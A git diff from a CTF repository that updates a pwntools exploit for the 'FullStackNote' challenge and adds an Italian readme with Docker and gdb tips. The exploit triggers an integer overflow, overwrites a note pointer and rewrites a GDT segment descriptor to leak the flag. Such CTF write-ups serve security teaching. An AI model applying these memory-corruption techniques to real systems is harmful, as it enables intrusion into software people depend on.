diff --git a/FullStackNote/exploit.py b/FullStackNote/exploit.py index c274670..69eea47 100755 --- a/FullStackNote/exploit.py +++ b/FullStackNote/exploit.py @@ -4,7 +4,12 @@ # $ pwn template ./sss.elf from pwn import * +# Challange description: +# +# BIOS + OS + APP to take a note and.... segmented! +# Can you get the flag at 0x1400000 ??? # Set up pwntools for the correct architecture +# exe = context.binary = ELF(args.EXE or './sss.elf') context.log_level = 'debug' @@ -14,7 +19,6 @@ context.log_level = 'debug' # ./exploit.py DEBUG NOASLR - def start(argv=[], *a, **kw): '''Start the exploit against the target.''' if args.GDB: @@ -61,25 +65,18 @@ kds_base = 0x1000000 utok_add = 0x100000 bytes_read = 127 ucs_off = 0x10 -val = gdt - kds_base - utok_add - bytes_read + ucs_off buf_read = 0x4f2c -flag_pos = 0x500000 * 4 -if (val < 0): - val = val + 2**32 +flag_pos = 0x1400000 retaddr = 0x4e90 ds_base = 0x4ef4 + 0x1100000 - retaddr #io = start() #io = process('./run.sh') -#io = remote('localhost', 1337) -io = remote('37.27.204.218', 1337) +io = remote('localhost', 1337) + io.recvuntil('>') io.sendline('1') io.recvuntil('note?') -# io.send('A'*56) -# io.send(p32(flag_pos - ds_base)) -# io.send(p32(exe.symbols['userspace_write'])) -# io.sendline(cyclic(98-56-8)) io.sendline('D'*98) io.recvuntil('>') @@ -87,43 +84,38 @@ io.sendline('1') io.recvuntil('note?') io.sendline('B'*98) +# integer overflow on +# u8 new_size; +# ... +# ... +# +# bytes_read = userspace_read(buf, sizeof(buf)); +# new_size = notebook.used + bytes_read; +# new_size +# +# will overwrite my_notebook.ptr + io.recvuntil('>') io.sendline('1') io.recvuntil('note?') +# overwrite my_notebook.ptr so that, accessed in kernel (so with ds = 0x10) and +# offset to translate from kernel to user macro (APP_ADDR_TO_KERNEL_ADDR), +# points to the gdt kernel data segment. Overwite the gdt so that kernel data +# segment so that when printing my_notebook.data the address will point to +# 0x1400000 (flag position, printing the flag) +val = gdt - kds_base - utok_add - bytes_read + ucs_off +if (val < 0): + val = val + 2**32 io.send('CCCC') io.send(p32(val)) -# io.send('F'*56) -# io.send(p32(0x10)) -# io.send(p32(flag_pos - ds_base)) -# io.send(p32(exe.symbols['userspace_write'])) -# io.send(b'G'*4) -# io.send(p32(0x10)) -# io.send(p32(flag_pos - ds_base)) -# io.sendline(cyclic(119-56-12-12)) io.sendline(cyclic(119)) io.recvuntil('>') io.sendline('3') io.recvuntil('remarks') kds = create_seg_descriptor(flag_pos - 0x100000 - buf_read, 0xffffffff) -ds = create_seg_descriptor(ds_base, 0xfffff) io.sendline(kds) -# io.send(p32(val)) -# io.sendline(cyclic(128 - 1 - 4)) -# io.recvuntil('Inserisci la tua nota:') -# io.sendline(cyclic(128)) -# io.send('2') -# data = io.recvuntil('Esci') -# print(data) -# shellcode = asm(shellcraft.sh()) -# payload = fit({ -# 32: 0xdeadbeef, -# 'iaaa': [1, 2, 'Hello', 3] -# }, length=128) -# io.send(payload) -# flag = io.recv(...) -# log.success(flag) io.interactive() diff --git a/FullStackNote/readme.md b/FullStackNote/readme.md new file mode 100644 index 0000000..d63b447 --- /dev/null +++ b/FullStackNote/readme.md @@ -0,0 +1,20 @@ +# Sfida CTF Hack or D(y|i)e 2024 + +## Descrizione: + +BIOS + OS + APP to take a note and.... segmented! +Can you get the flag at 0x1400000 ??? + +Per lanciare la sfida in locale: + +docker build -t biosnote . +docker run -p 1337:1337 --privileged --rm --name biosnote biosnote + +writeup/exploit in exploit.py + +## Tips + +se usiamo gdb con qemu -S -s, gdb non traduce automaticamente gli indirizzi +logici in indirizzi fisici usando la segmentazione. Per settare breakpoint +calcolare l'indirizzo fisico dell'istruzione e usare break *indirizzo. +